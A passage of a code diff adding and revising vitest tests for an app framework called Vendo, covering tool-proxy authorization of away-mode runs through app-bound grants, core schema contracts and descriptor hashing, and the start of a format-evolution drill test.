+    const guard = guardFixture({ rules: { host_park: "ask", host_forbidden: "block" } });
+    const store = memoryStore();
+    const sandbox = fakeSandbox();
+    const runtime = createApps({
+      store,
+      guard,
+      tools: bindTools(guard, rawTools),
+      sandbox,
+      proxyUrl: "https://proxy.test",
+      catalog: [],
+      model: basicLanguageModel(),
+    });
+    const app = await runtime.create({ prompt: "Away worker" }, ctx("user_ada"));
+    await seedAppRow(store, { ...app, ui: "http" }, "user_ada");
+
+    // Open the app while the user is AWAY — the minted run token must carry presence.
+    await runtime.open(app.id, ctx("user_ada", "away"));
+    await vi.waitFor(() => expect(sandbox.machines.size).toBe(1));
+    const token = [...sandbox.machines.values()].at(-1)?.env.VENDO_RUN_TOKEN as string;
+
+    const toolCall = (tool: string) => runtime.proxy.handler(new Request(`https://proxy.test/tools/${tool}`, {
+      method: "POST",
+      headers: { authorization: `Bearer ${token}`, "content-type": "application/json" },
+      body: JSON.stringify({ args: {} }),
+    }));
+
+    // A granted-by-default tool runs and the RunContext reflects the away token scope + app id.
+    expect(await json(await toolCall("host_read"))).toEqual({
+      status: "ok",
+      output: { tool: "host_read", presence: "away", appId: app.id },
+    });
+
+    // Ungranted-but-parked → pending-approval fail-soft outcome (never an exception).
+    expect(await json(await toolCall("host_park"))).toMatchObject({ status: "pending-approval", approvalId: expect.any(String) });
+
+    // A guard block surfaces as a blocked outcome, not authority.
+    expect(await json(await toolCall("host_forbidden"))).toEqual({ status: "blocked", reason: expect.any(String) });
+
+    // The machine cannot invent tools: an unknown name resolves against the bound registry only.
+    expect(await json(await toolCall("host_unknown"))).toMatchObject({ status: "error", error: { code: "not-found" } });
+  });
+});

--- a/packages/apps/src/runtime.e2e.test.ts
+++ b/packages/apps/src/runtime.e2e.test.ts
@@ -1,5 +1,6 @@
 import {
   VENDO_APP_FORMAT,
+  descriptorHash,
   type AppDocument,
   type RunContext,
   type ToolDescriptor,
@@ -183,6 +184,23 @@ describe("tool proxy authority (e2e)", () => {
     const app = await runtime.create({ prompt: "Away worker" }, ctx("user_ada"));
     await seedAppRow(store, { ...app, ui: "http" }, "user_ada");
 
+    // 05 §6: an away run is authorized only by a present-captured, app-bound grant
+    // (`appId` matches the running app). Seed exactly that for host_read so the away
+    // call is legitimately authorized — the frozen rule, not the "ungranted away read
+    // runs" the fixture's away-park gap previously let this test assert. This is the
+    // authorized call whose away RunContext we observe flowing through the proxy.
+    guard.grants.push({
+      id: "grt_away_read",
+      subject: "user_ada",
+      tool: "host_read",
+      descriptorHash: descriptorHash(descriptors[0]!),
+      scope: { kind: "tool" },
+      duration: "standing",
+      appId: app.id,
+      source: "automation",
+      grantedAt: new Date().toISOString(),
+    });
+
     // Open the app while the user is AWAY — the minted run token must carry presence.
     await runtime.open(app.id, ctx("user_ada", "away"));
     await vi.waitFor(() => expect(sandbox.machines.size).toBe(1));
@@ -194,13 +212,14 @@ describe("tool proxy authority (e2e)", () => {
       body: JSON.stringify({ args: {} }),
     }));
 
-    // A granted-by-default tool runs and the RunContext reflects the away token scope + app id.
+    // The app-bound grant authorizes the away read; the RunContext reflects the away
+    // token scope + app id (05 §6 — a present-captured app-bound grant runs away).
     expect(await json(await toolCall("host_read"))).toEqual({
       status: "ok",
       output: { tool: "host_read", presence: "away", appId: app.id },
     });
 
-    // Ungranted-but-parked → pending-approval fail-soft outcome (never an exception).
+    // Ungranted away write parks → pending-approval fail-soft outcome (never an exception).
     expect(await json(await toolCall("host_park"))).toMatchObject({ status: "pending-approval", approvalId: expect.any(String) });
 
     // A guard block surfaces as a blocked outcome, not authority.

--- a/packages/core/src/contract-coverage.e2e.test.ts
+++ b/packages/core/src/contract-coverage.e2e.test.ts
@@ -1,0 +1,536 @@
+/**
+ * Contract-coverage e2e — exercises the contracted behaviors of 01-core.md that
+ * the neighbor blocks depend on but the pre-existing suites left unexercised.
+ * Everything imports from the package root (`./index.js`) — the single public
+ * export surface a sibling block sees; the packed-artifact equivalence of that
+ * surface is proven separately by packaging.e2e.test.ts.
+ *
+ * The descriptorHash independence check uses node:crypto as a SEPARATE SHA-256
+ * oracle (the shipped dist rolls its own in sha256.ts) and a hand-written JCS
+ * canonical string as a separate canonicalization oracle — so agreement here is
+ * genuine cross-implementation agreement, not the package agreeing with itself.
+ * node:crypto is a test-only import; the dist stays platform-clean.
+ */
+import { createHash } from "node:crypto";
+import { describe, expect, it } from "vitest";
+import * as core from "./index.js";
+import {
+  VENDO_APP_FORMAT,
+  VENDO_TREE_FORMAT,
+  VENDO_TOOLS_FORMAT,
+  VENDO_OVERRIDES_FORMAT,
+  VENDO_POLICY_FORMAT,
+  TOOL_NAME_PATTERN,
+  VendoError,
+  appIdSchema,
+  grantIdSchema,
+  approvalIdSchema,
+  runIdSchema,
+  threadIdSchema,
+  isoDateTimeSchema,
+  jsonSchemaSchema,
+  principalSchema,
+  runContextSchema,
+  triggerRefSchema,
+  riskLabelSchema,
+  toolDescriptorSchema,
+  toolCallSchema,
+  toolOutcomeSchema,
+  grantConstraintSchema,
+  grantScopeSchema,
+  grantDurationSchema,
+  permissionGrantSchema,
+  approvalRequestSchema,
+  approvalDecisionSchema,
+  guardDecisionSchema,
+  auditEventSchema,
+  uiPayloadSchema,
+  treeSchema,
+  treeNodeSchema,
+  treeQuerySchema,
+  storageDeclSchema,
+  pinSchema,
+  appDocumentSchema,
+  triggerSourceSchema,
+  runModelSchema,
+  stepSchema,
+  triggerSchema,
+  vendoRecordSchema,
+  recordQuerySchema,
+  authMaterialSchema,
+  agentRunReportSchema,
+  vendoThemeSchema,
+  vendoViewPartSchema,
+  vendoApprovalPartSchema,
+  vendoErrorCodeSchema,
+  canonicalJson,
+  descriptorHash,
+  validateTree,
+  validateAppDocument,
+  type ToolDescriptor,
+} from "./index.js";
+
+/** node:crypto oracle — an implementation independent of the shipped sha256.ts. */
+const oracleHash = (canonical: string): string =>
+  `sha256:${createHash("sha256").update(canonical, "utf8").digest("hex")}`;
+
+describe("§1 — format constants are pinned to their exact wire strings", () => {
+  // Renaming any of these breaks stored records; the string values ARE the contract.
+  it("carries the five frozen format tags verbatim", () => {
+    expect(VENDO_APP_FORMAT).toBe("vendo/app@1");
+    expect(VENDO_TREE_FORMAT).toBe("vendo-genui/v1");
+    expect(VENDO_TOOLS_FORMAT).toBe("vendo/tools@1");
+    expect(VENDO_OVERRIDES_FORMAT).toBe("vendo/overrides@1");
+    expect(VENDO_POLICY_FORMAT).toBe("vendo/policy@1");
+  });
+});
+
+describe("§1 — id schemas enforce their stable prefixes", () => {
+  const cases: Array<[string, typeof appIdSchema, string, string]> = [
+    ["appId", appIdSchema, "app_", "grt_"],
+    ["grantId", grantIdSchema, "grt_", "app_"],
+    ["approvalId", approvalIdSchema, "apr_", "run_"],
+    ["runId", runIdSchema, "run_", "thr_"],
+    ["threadId", threadIdSchema, "thr_", "apr_"],
+  ];
+  it.each(cases)("%s accepts its prefix and rejects a foreign one, empty body, and bare prefix", (_name, schema, good, bad) => {
+    expect(schema.safeParse(`${good}abc123`).success).toBe(true);
+    expect(schema.safeParse(`${bad}abc123`).success).toBe(false);
+    expect(schema.safeParse(good).success).toBe(false); // prefix with no body (.+ required)
+    expect(schema.safeParse("").success).toBe(false);
+  });
+
+  it("isoDateTimeSchema accepts UTC ISO-8601 and rejects offset/garbage", () => {
+    expect(isoDateTimeSchema.safeParse("2026-07-11T16:00:00.000Z").success).toBe(true);
+    expect(isoDateTimeSchema.safeParse("2026-07-11 16:00:00").success).toBe(false);
+    expect(isoDateTimeSchema.safeParse("not-a-date").success).toBe(false);
+  });
+
+  it("jsonSchemaSchema accepts a JSON-Schema-shaped record and rejects non-objects", () => {
+    expect(jsonSchemaSchema.safeParse({ type: "object", properties: {} }).success).toBe(true);
+    expect(jsonSchemaSchema.safeParse("string").success).toBe(false);
+    expect(jsonSchemaSchema.safeParse([]).success).toBe(false);
+  });
+});
+
+describe("§2 — principalSchema pins kind to user, org is Cloud-reserved", () => {
+  it("accepts a user principal with optional display and ephemeral", () => {
+    expect(principalSchema.safeParse({ kind: "user", subject: "user_1" }).success).toBe(true);
+    expect(principalSchema.safeParse({
+      kind: "user", subject: "sess_anon", display: "Anon", ephemeral: true,
+    }).success).toBe(true);
+  });
+
+  it("rejects the reserved org kind and a missing subject", () => {
+    expect(principalSchema.safeParse({ kind: "org", subject: "org_1" }).success).toBe(false);
+    expect(principalSchema.safeParse({ kind: "user" }).success).toBe(false);
+  });
+});
+
+describe("§3 — run context and trigger ref", () => {
+  it("accepts every venue and presence, and carries request headers", () => {
+    for (const venue of ["chat", "app", "automation", "mcp"] as const) {
+      for (const presence of ["present", "away"] as const) {
+        expect(runContextSchema.safeParse({
+          principal: { kind: "user", subject: "u" },
+          venue, presence, sessionId: "s",
+          requestHeaders: { Authorization: "Bearer x" },
+        }).success).toBe(true);
+      }
+    }
+    expect(runContextSchema.safeParse({
+      principal: { kind: "user", subject: "u" }, venue: "voice", presence: "present", sessionId: "s",
+    }).success).toBe(false);
+  });
+
+  it("triggerRef requires a run_ id and a known trigger kind", () => {
+    expect(triggerRefSchema.safeParse({ runId: "run_1", kind: "schedule" }).success).toBe(true);
+    expect(triggerRefSchema.safeParse({ runId: "job_1", kind: "schedule" }).success).toBe(false);
+    expect(triggerRefSchema.safeParse({ runId: "run_1", kind: "webhook" }).success).toBe(false);
+  });
+});
+
+describe("§4 — TOOL_NAME_PATTERN is the provider-safe charset with a 1..64 length", () => {
+  it("accepts the boundary lengths and the full legal charset", () => {
+    expect(TOOL_NAME_PATTERN.test("a")).toBe(true);
+    expect(TOOL_NAME_PATTERN.test("a".repeat(64))).toBe(true);
+    expect(TOOL_NAME_PATTERN.test("host_invoices_list-2")).toBe(true);
+    expect(riskLabelSchema.options).toEqual(["read", "write", "destructive"]);
+  });
+
+  it("rejects empty, over-length, dotted, and whitespace names", () => {
+    expect(TOOL_NAME_PATTERN.test("")).toBe(false);
+    expect(TOOL_NAME_PATTERN.test("a".repeat(65))).toBe(false);
+    expect(TOOL_NAME_PATTERN.test("host.invoices.list")).toBe(false);
+    expect(TOOL_NAME_PATTERN.test("host invoices")).toBe(false);
+    // toolDescriptorSchema enforces the same pattern on its name field
+    expect(toolDescriptorSchema.safeParse({
+      name: "a".repeat(65), description: "x", inputSchema: {}, risk: "read",
+    }).success).toBe(false);
+  });
+
+  it("toolCall requires args to be present (undefined is not JSON)", () => {
+    expect(toolCallSchema.safeParse({ id: "c1", tool: "host_x", args: null }).success).toBe(true);
+    expect(toolCallSchema.safeParse({ id: "c1", tool: "host_x" }).success).toBe(false);
+  });
+
+  it("toolOutcome accepts the four variants and rejects an unknown status", () => {
+    expect(toolOutcomeSchema.safeParse({ status: "ok", output: 1 }).success).toBe(true);
+    expect(toolOutcomeSchema.safeParse({ status: "pending-approval", approvalId: "apr_1" }).success).toBe(true);
+    expect(toolOutcomeSchema.safeParse({ status: "pending-approval", approvalId: "x" }).success).toBe(false);
+    expect(toolOutcomeSchema.safeParse({ status: "queued" }).success).toBe(false);
+  });
+});
+
+describe("§4 — descriptorHash agrees with an independent JCS + SHA-256 oracle", () => {
+  // Hand-written RFC 8785 canonical form: top-level keys sorted
+  // (critical, description, inputSchema, name, risk); inputSchema keys sorted (a, b).
+  const descriptor: ToolDescriptor = {
+    name: "gmail_send",
+    description: "Send ✉", // an envelope, exercising multi-byte UTF-8
+    inputSchema: { b: 1, a: 2 },
+    risk: "write",
+    critical: true,
+  };
+  const handCanonical =
+    '{"critical":true,"description":"Send ✉","inputSchema":{"a":2,"b":1},"name":"gmail_send","risk":"write"}';
+
+  it("canonicalizes the preimage byte-for-byte to the hand-written JCS string", () => {
+    // canonicalJson of the exact preimage descriptorHash builds.
+    expect(canonicalJson({
+      name: descriptor.name,
+      description: descriptor.description,
+      inputSchema: descriptor.inputSchema,
+      risk: descriptor.risk,
+      critical: descriptor.critical,
+    })).toBe(handCanonical);
+  });
+
+  it("hashes to sha256:<node-crypto digest of the canonical string>", () => {
+    expect(descriptorHash(descriptor)).toBe(oracleHash(handCanonical));
+    expect(descriptorHash(descriptor).startsWith("sha256:")).toBe(true);
+  });
+
+  it("omits absent optional fields from the preimage (critical absent != critical:false)", () => {
+    const base: ToolDescriptor = { name: "host_x", description: "d", inputSchema: {}, risk: "read" };
+    const absentCanonical = '{"description":"d","inputSchema":{},"name":"host_x","risk":"read"}';
+    const falseCanonical = '{"critical":false,"description":"d","inputSchema":{},"name":"host_x","risk":"read"}';
+    expect(descriptorHash(base)).toBe(oracleHash(absentCanonical));
+    expect(descriptorHash({ ...base, critical: false })).toBe(oracleHash(falseCanonical));
+    expect(descriptorHash(base)).not.toBe(descriptorHash({ ...base, critical: false }));
+  });
+
+  it("is stable across key insertion order (the whole point of canonicalization)", () => {
+    const a: ToolDescriptor = { name: "n", description: "d", inputSchema: { x: 1, y: 2 }, risk: "read" };
+    const b: ToolDescriptor = { risk: "read", inputSchema: { y: 2, x: 1 }, description: "d", name: "n" };
+    expect(descriptorHash(a)).toBe(descriptorHash(b));
+  });
+});
+
+describe("§4 — the committed vectors reproduce under the independent oracle", () => {
+  // Re-derive each vector's hash from its declared canonical form via node:crypto,
+  // proving the committed hashes are correct SHA-256 digests, not self-referential.
+  it("every packaged vector's hash equals node:crypto(canonical) and descriptorHash(descriptor)", async () => {
+    const { readFileSync } = await import("node:fs");
+    const vectors = JSON.parse(
+      readFileSync(new URL("../vectors/descriptor-hash.json", import.meta.url), "utf8"),
+    ) as { vectors: Array<{ name: string; descriptor: ToolDescriptor; canonical: string; hash: string }> };
+    expect(vectors.vectors.length).toBeGreaterThanOrEqual(5);
+    for (const vector of vectors.vectors) {
+      expect(oracleHash(vector.canonical), vector.name).toBe(vector.hash);
+      expect(descriptorHash(vector.descriptor), vector.name).toBe(vector.hash);
+    }
+  });
+});
+
+describe("§5 — grant constraints, scopes, durations, and mint sources", () => {
+  it("accepts every constraint op and value type, rejects unknown op / non-primitive value", () => {
+    for (const op of ["eq", "lte", "gte", "matches"] as const) {
+      expect(grantConstraintSchema.safeParse({ path: "/x", op, value: "v" }).success).toBe(true);
+    }
+    for (const value of ["s", 10, true]) {
+      expect(grantConstraintSchema.safeParse({ path: "/x", op: "eq", value }).success).toBe(true);
+    }
+    expect(grantConstraintSchema.safeParse({ path: "/x", op: "ne", value: 1 }).success).toBe(false);
+    expect(grantConstraintSchema.safeParse({ path: "/x", op: "eq", value: { nested: true } }).success).toBe(false);
+  });
+
+  it("distinguishes the three grant scope variants and enforces their fields", () => {
+    expect(grantScopeSchema.safeParse({ kind: "tool" }).success).toBe(true);
+    expect(grantScopeSchema.safeParse({ kind: "exact", inputHash: "sha256:a", inputPreview: "p" }).success).toBe(true);
+    expect(grantScopeSchema.safeParse({ kind: "exact", inputHash: "sha256:a" }).success).toBe(false);
+    expect(grantScopeSchema.safeParse({ kind: "constrained", constraints: [] }).success).toBe(true);
+    expect(grantScopeSchema.safeParse({ kind: "constrained" }).success).toBe(false);
+    expect(grantScopeSchema.safeParse({ kind: "whole" }).success).toBe(false);
+  });
+
+  it("accepts every grant duration and every mint source", () => {
+    expect(grantDurationSchema.options).toEqual(["standing", "session", "task"]);
+    const base = {
+      id: "grt_1", subject: "user_1", tool: "host_x", descriptorHash: "sha256:a",
+      scope: { kind: "tool" as const }, grantedAt: "2026-07-11T16:00:00.000Z",
+    };
+    for (const duration of ["standing", "session", "task"] as const) {
+      for (const source of ["chat", "batch", "automation"] as const) {
+        expect(permissionGrantSchema.safeParse({ ...base, duration, source }).success).toBe(true);
+      }
+    }
+    expect(permissionGrantSchema.safeParse({ ...base, duration: "session", source: "judge" }).success).toBe(false);
+  });
+
+  it("approvalRequest freezes descriptor and preview; approvalDecision can mint a grant", () => {
+    const at = "2026-07-11T16:00:00.000Z";
+    const descriptor: ToolDescriptor = { name: "gmail_send", description: "Send", inputSchema: {}, risk: "write", critical: true };
+    expect(approvalRequestSchema.safeParse({
+      id: "apr_1",
+      call: { id: "c1", tool: "gmail_send", args: { to: "a@b.c" } },
+      descriptor,
+      inputPreview: "Send to a@b.c",
+      ctx: { principal: { kind: "user", subject: "u" }, venue: "chat", presence: "present" },
+      createdAt: at,
+    }).success).toBe(true);
+    expect(approvalDecisionSchema.safeParse({ approve: false }).success).toBe(true);
+    expect(approvalDecisionSchema.safeParse({
+      approve: true, remember: { scope: { kind: "tool" }, duration: "standing" },
+    }).success).toBe(true);
+  });
+});
+
+describe("§6/§7 — guard decisions and audit events", () => {
+  it("audit accepts every event kind and every decidedBy source, requires aud_ ids", () => {
+    const base = {
+      id: "aud_1", at: "2026-07-11T16:00:00.000Z",
+      principal: { kind: "user", subject: "u" }, venue: "chat", presence: "present",
+    } as const;
+    for (const kind of ["tool-call", "approval", "policy-decision", "run", "app-lifecycle", "share"] as const) {
+      expect(auditEventSchema.safeParse({ ...base, kind }).success).toBe(true);
+    }
+    expect(auditEventSchema.safeParse({ ...base, kind: "unknown-kind" }).success).toBe(false);
+    expect(auditEventSchema.safeParse({ ...base, kind: "run", id: "x_1" }).success).toBe(false);
+  });
+
+  it("guard 'run' decision cannot borrow an 'ask'/'block' decidedBy value", () => {
+    expect(guardDecisionSchema.safeParse({ action: "run", decidedBy: "critical" }).success).toBe(false);
+    expect(guardDecisionSchema.safeParse({ action: "ask", decidedBy: "grant", approval: undefined }).success).toBe(false);
+  });
+});
+
+describe("§8 — UIPayload is the format-tag dispatch surface; unknown tags are valid payloads", () => {
+  it("requires a string formatVersion and preserves everything past the tag", () => {
+    expect(uiPayloadSchema.safeParse({ formatVersion: "vendo-genui/v1", root: "r", nodes: [] }).success).toBe(true);
+    const parsed = uiPayloadSchema.safeParse({ formatVersion: "vendo-canvas/v2", opaque: { a: 1 } });
+    expect(parsed.success).toBe(true);
+    if (parsed.success) expect(parsed.data.opaque).toEqual({ a: 1 }); // passthrough keeps unknown keys
+    expect(uiPayloadSchema.safeParse({ root: "r" }).success).toBe(false); // no formatVersion
+    expect(uiPayloadSchema.safeParse({ formatVersion: 1 }).success).toBe(false); // non-string tag
+  });
+
+  it("an unknown tag passes UIPayload but validateTree rejects it as a 'version' error (containment is the renderer's job)", () => {
+    const unknown = { formatVersion: "vendo-canvas/v2", root: "r", nodes: [] };
+    expect(uiPayloadSchema.safeParse(unknown).success).toBe(true);
+    const result = validateTree(unknown);
+    expect(result.ok).toBe(false);
+    if (!result.ok) expect(result.error.code).toBe("version");
+  });
+});
+
+describe("§8 — tree/node/query schemas parse the structural shape", () => {
+  it("treeSchema accepts a minimal v1 tree and rejects a foreign formatVersion", () => {
+    expect(treeSchema.safeParse({
+      formatVersion: "vendo-genui/v1", root: "a", nodes: [{ id: "a", component: "Text" }],
+    }).success).toBe(true);
+    expect(treeSchema.safeParse({
+      formatVersion: "vendo-genui/v2", root: "a", nodes: [],
+    }).success).toBe(false);
+  });
+
+  it("treeNode and treeQuery enforce their required fields", () => {
+    expect(treeNodeSchema.safeParse({ id: "a", component: "Text", source: "generated" }).success).toBe(true);
+    expect(treeNodeSchema.safeParse({ id: "a", component: "Text", source: "wired" }).success).toBe(false);
+    expect(treeQuerySchema.safeParse({ path: "/x", tool: "host_x", input: { limit: 5 } }).success).toBe(true);
+    expect(treeQuerySchema.safeParse({ path: "/x" }).success).toBe(false);
+  });
+});
+
+describe("§8 — validateTree validates fn: GRAMMAR only; machine-presence is an app-document rule", () => {
+  // The Tree shape carries no server/machine field, so validateTree structurally
+  // cannot enforce "trees without a machine must not contain fn: references." It
+  // validates fn: grammar; validateAppDocument (which knows `server`) enforces the
+  // machine-presence rule. See ESCALATION in the lane report.
+  it("accepts a well-formed fn: reference with no server in sight", () => {
+    expect(validateTree({
+      formatVersion: "vendo-genui/v1", root: "r",
+      nodes: [{ id: "r", component: "Text" }],
+      queries: [{ path: "", tool: "fn:refresh" }],
+    }).ok).toBe(true);
+  });
+
+  it("rejects fn: references that violate the /^fn:[A-Za-z_][A-Za-z0-9_-]*$/ grammar", () => {
+    for (const tool of ["fn:", "fn:9lead", "fn:has space", "fn:slash/x"]) {
+      const result = validateTree({
+        formatVersion: "vendo-genui/v1", root: "r",
+        nodes: [{ id: "r", component: "Text" }],
+        queries: [{ path: "", tool }],
+      });
+      expect(result.ok, tool).toBe(false);
+      if (!result.ok) expect(result.error.code).toBe("provision");
+    }
+  });
+
+  it("validateAppDocument is where a machine-less fn: reference becomes an error", () => {
+    const withFnNoServer = {
+      format: "vendo/app@1", id: "app_x", name: "X", ui: "tree" as const,
+      tree: {
+        formatVersion: "vendo-genui/v1", root: "r",
+        nodes: [{ id: "r", component: "Text" }],
+        queries: [{ path: "", tool: "fn:refresh" }],
+      },
+    };
+    expect(validateAppDocument(withFnNoServer).ok).toBe(false);
+    expect(validateAppDocument({ ...withFnNoServer, server: "e2b:snap_1" }).ok).toBe(true);
+  });
+});
+
+describe("§9 — app document plane values and sub-schemas", () => {
+  it("accepts the http plane (keeps the last payload as a cover)", () => {
+    const httpApp = {
+      format: "vendo/app@1", id: "app_http", name: "Server App", ui: "http" as const,
+      server: "e2b:snap_1",
+    };
+    expect(appDocumentSchema.safeParse(httpApp).success).toBe(true);
+    expect(validateAppDocument(httpApp).ok).toBe(true);
+  });
+
+  it("storageDecl defaults kind to records and pin base must be a hash ref", () => {
+    expect(storageDeclSchema.safeParse({ about: "x" }).success).toBe(true);
+    expect(storageDeclSchema.safeParse({ about: "x", kind: "blobs" }).success).toBe(false);
+    expect(pinSchema.safeParse({ slot: "card", base: "sha256:abc" }).success).toBe(true);
+  });
+});
+
+describe("§11 — trigger sources and run models", () => {
+  it("schedule requires exactly one of cron/every/at across the full matrix", () => {
+    const at = "2026-07-11T16:00:00.000Z";
+    const ok = [{ cron: "0 9 * * 1" }, { every: "1h" }, { at }];
+    for (const extra of ok) {
+      expect(triggerSourceSchema.safeParse({ kind: "schedule", ...extra }).success).toBe(true);
+    }
+    const bad = [
+      {}, // none
+      { cron: "* * * * *", every: "1h" },
+      { cron: "* * * * *", at },
+      { every: "1h", at },
+      { cron: "* * * * *", every: "1h", at },
+    ];
+    for (const extra of bad) {
+      expect(triggerSourceSchema.safeParse({ kind: "schedule", ...extra }).success).toBe(false);
+    }
+    // an at that is not ISO-8601 is rejected
+    expect(triggerSourceSchema.safeParse({ kind: "schedule", at: "soon" }).success).toBe(false);
+  });
+
+  it("accepts host-event and external trigger sources", () => {
+    expect(triggerSourceSchema.safeParse({ kind: "host-event", event: "invoice.created" }).success).toBe(true);
+    expect(triggerSourceSchema.safeParse({ kind: "host-event" }).success).toBe(false);
+    expect(triggerSourceSchema.safeParse({
+      kind: "external", connector: "gmail", event: "message.received", config: { label: "INBOX" },
+    }).success).toBe(true);
+  });
+
+  it("run models: agentic prompt/budget and ordered steps", () => {
+    expect(runModelSchema.safeParse({ kind: "agentic", prompt: "do it" }).success).toBe(true);
+    expect(runModelSchema.safeParse({ kind: "agentic", prompt: "do it", budget: { maxToolCalls: 3 } }).success).toBe(true);
+    expect(runModelSchema.safeParse({ kind: "steps", steps: [{ id: "s1", tool: "host_x" }] }).success).toBe(true);
+    expect(runModelSchema.safeParse({ kind: "pipeline", steps: [] }).success).toBe(false);
+    expect(stepSchema.safeParse({ id: "s1", tool: "fn:x", if: "$exists(event)", forEach: "steps.load" }).success).toBe(true);
+    expect(triggerSchema.safeParse({
+      on: { kind: "host-event", event: "e" }, run: { kind: "agentic", prompt: "p" },
+    }).success).toBe(true);
+  });
+});
+
+describe("§12/§13/§14 — store, host-seam, and theme schemas", () => {
+  it("vendoRecord requires timestamps and present data; recordQuery is all-optional", () => {
+    const at = "2026-07-11T16:00:00.000Z";
+    expect(vendoRecordSchema.safeParse({ id: "r1", data: { a: 1 }, createdAt: at, updatedAt: at }).success).toBe(true);
+    expect(vendoRecordSchema.safeParse({ id: "r1", createdAt: at, updatedAt: at }).success).toBe(false); // data missing
+    expect(recordQuerySchema.safeParse({}).success).toBe(true);
+    expect(recordQuerySchema.safeParse({ refs: { owner: "u" }, ids: ["a"], limit: 10, cursor: "5" }).success).toBe(true);
+  });
+
+  it("authMaterial and agentRunReport parse the seam return shapes", () => {
+    expect(authMaterialSchema.safeParse({ headers: { Authorization: "Bearer x" } }).success).toBe(true);
+    expect(authMaterialSchema.safeParse({ headers: { Authorization: 1 } }).success).toBe(false);
+    expect(agentRunReportSchema.safeParse({
+      status: "stopped", summary: "hit budget",
+      toolCalls: [{ call: { id: "c", tool: "host_x", args: {} }, outcome: "ok" }],
+    }).success).toBe(true);
+  });
+
+  it("vendoTheme accepts the remaining density/motion enum values", () => {
+    expect(vendoThemeSchema.safeParse({
+      colors: {
+        background: "#000", surface: "#111", text: "#fff", muted: "#999",
+        accent: "#00f", accentText: "#fff", danger: "#f00", border: "#333",
+      },
+      typography: { fontFamily: "Inter", headingFamily: "Newsreader", baseSize: "16px" },
+      radius: { small: "2px", medium: "6px", large: "12px" },
+      density: "compact", motion: "full",
+    }).success).toBe(true);
+  });
+
+  it("stream parts carry the pinned data-* type discriminants", () => {
+    expect(vendoViewPartSchema.safeParse({
+      type: "data-vendo-view", appId: "app_1", payload: { formatVersion: "vendo-genui/v1" },
+    }).success).toBe(true);
+    expect(vendoViewPartSchema.safeParse({
+      type: "data-vendo-render", appId: "app_1", payload: { formatVersion: "vendo-genui/v1" },
+    }).success).toBe(false);
+    expect(vendoApprovalPartSchema.safeParse({ type: "data-vendo-approval", toolCallId: "c1", risk: "read" }).success).toBe(true);
+  });
+});
+
+describe("§15 — VendoErrorCode taxonomy and unknown-code forward compatibility", () => {
+  it("vendoErrorCodeSchema accepts exactly the seven codes and rejects cut/unknown ones", () => {
+    for (const code of [
+      "validation", "blocked", "not-implemented", "sandbox-unavailable",
+      "cloud-required", "not-found", "conflict",
+    ]) {
+      expect(vendoErrorCodeSchema.safeParse(code).success).toBe(true);
+    }
+    expect(vendoErrorCodeSchema.safeParse("grant-required").success).toBe(false); // cut in round-4
+    expect(vendoErrorCodeSchema.safeParse("teapot").success).toBe(false);
+  });
+
+  it("VendoError still constructs with a future code (additive within the train)", () => {
+    // A client treats an unknown code as a generic error, but the class must not
+    // throw on one — new codes are additive.
+    const future = new VendoError("future-code" as core.VendoErrorCode, "later", { hint: 1 });
+    expect(future).toBeInstanceOf(Error);
+    expect(future.code).toBe("future-code");
+    expect(future.detail).toEqual({ hint: 1 });
+  });
+});
+
+describe("public export surface — every contracted camelCaseName schema is present", () => {
+  // Zod-completeness guard: every wire-crossing/persisted 01-core type ships a schema.
+  it("exposes all expected <name>Schema exports as zod schemas", () => {
+    const expected = [
+      "principalSchema", "runContextSchema", "triggerRefSchema", "riskLabelSchema",
+      "toolDescriptorSchema", "toolCallSchema", "toolOutcomeSchema", "grantConstraintSchema",
+      "grantScopeSchema", "grantDurationSchema", "permissionGrantSchema", "approvalRequestSchema",
+      "approvalDecisionSchema", "guardDecisionSchema", "auditEventSchema", "uiPayloadSchema",
+      "treeSchema", "treeNodeSchema", "treeQuerySchema", "appDocumentSchema", "storageDeclSchema",
+      "pinSchema", "triggerSourceSchema", "runModelSchema", "stepSchema", "triggerSchema",
+      "vendoRecordSchema", "recordQuerySchema", "authMaterialSchema", "agentRunReportSchema",
+      "vendoThemeSchema", "vendoViewPartSchema", "vendoApprovalPartSchema", "vendoErrorCodeSchema",
+      "appIdSchema", "grantIdSchema", "approvalIdSchema", "runIdSchema", "threadIdSchema",
+      "isoDateTimeSchema", "jsonSchemaSchema",
+    ];
+    const registry = core as unknown as Record<string, unknown>;
+    for (const name of expected) {
+      expect(name in registry, `missing export ${name}`).toBe(true);
+      expect(typeof (registry[name] as { safeParse?: unknown }).safeParse, `${name} is not a zod schema`).toBe("function");
+    }
+  });
+});

--- a/packages/core/src/format-drill.test.ts
+++ b/packages/core/src/format-drill.test.ts
@@ -1,0 +1,133 @@
+import { describe, expect, it } from "vitest";
+import { VENDO_APP_FORMAT, VENDO_TREE_FORMAT } from "./formats.js";
+import {
+  uiPayloadSchema,
+  validateTree,
+  type Tree,
+  type UIPayload,
+} from "./tree.js";
+import { validateAppDocument, type AppDocument } from "./app-document.js";
+
+/**
+ * FORMAT-EVOLUTION FIRE DRILL — the CORE seam (01-core §8; 00-overview "How this
+ * set evolves without breaking").
+ *
+ * A throwaway second UI format, registered nowhere in product source, proves the
+ * format-tagged payload contract dispatches strictly on `formatVersion`:
+ *  - any tag is a valid UIPayload (the tag owns everything past itself);
+ *  - `validateTree` rejects a non-v1 tag as not-its-format (code "version");
+ *  - the v0 tree still validates unchanged;
+ *  - core makes NO assumption that a payload is a tree on the app-document path —
+ *    `AppDocument.tree` is `UIPayload`, and `validateAppDocument` accepts a
+ *    document whose tree carries the drill tag, contents untouched. That is the
+ *    contract's "a future format slots in behind the tag without touching the
+ *    app document shape."
+ *
+ * The drill tag lives ONLY in this test file; it is never a registered format.
+ */
+const DRILL_FORMAT = "vendo/tree@2-drill";
+
+/** The drill format's shape is deliberately NOT tree-shaped (no root/nodes): a
+ *  block list. If any core validator on the app-document path body-sniffed the
+ *  payload as a tree, this shape would fail — it must not. */
+interface DrillPayload extends UIPayload {
+  formatVersion: typeof DRILL_FORMAT;
+  blocks: Array<{ heading: string; body: string }>;
+}
+
+const drillPayload = (): DrillPayload => ({
+  formatVersion: DRILL_FORMAT,
+  blocks: [
+    { heading: "Quarterly revenue", body: "$4,200 across 3 invoices" },
+    { heading: "Next step", body: "Send the reminder" },
+  ],
+});
+
+const v1Tree = (): Tree => ({
+  formatVersion: VENDO_TREE_FORMAT,
+  root: "root",
+  nodes: [
+    { id: "root", component: "Stack", children: ["title"] },
+    { id: "title", component: "Text", props: { text: "Instant invoice" } },
+  ],
+});
+
+describe("format-evolution fire drill — core dispatches by tag", () => {
